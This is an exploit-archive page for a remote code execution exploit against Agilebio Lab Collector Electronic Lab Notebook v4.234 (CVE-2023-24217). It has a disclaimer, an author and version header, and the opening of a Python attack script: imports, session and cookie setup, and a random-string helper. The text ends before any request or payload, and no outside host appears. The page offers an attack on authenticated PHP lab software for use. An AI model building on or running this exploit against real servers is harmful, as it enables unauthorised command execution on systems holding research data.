Exploits / Vulnerability Discovered : 2023-04-06 |
Type : webapps |
Platform : php
This exploit / vulnerability Agilebio lab collector electronic lab notebookv4.234 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE)
# Date: 2023-02-28
# Exploit Author: Anthony Cole
# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/
# Version: v4.234
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: PHP/MYSQL
# CVE: CVE-2023-24217
# Category: webapps
#
# Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.
#
from argparse import ArgumentParser
from requests import Session
from random import choice
from string import ascii_lowercase, ascii_uppercase, digits
import re
from base64 import b64encode
from urllib.parse import quote_plus
sess:Session = Session()
cookies = {}
headers = {}
state = {}
def random_string(length:int) -> str:
return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))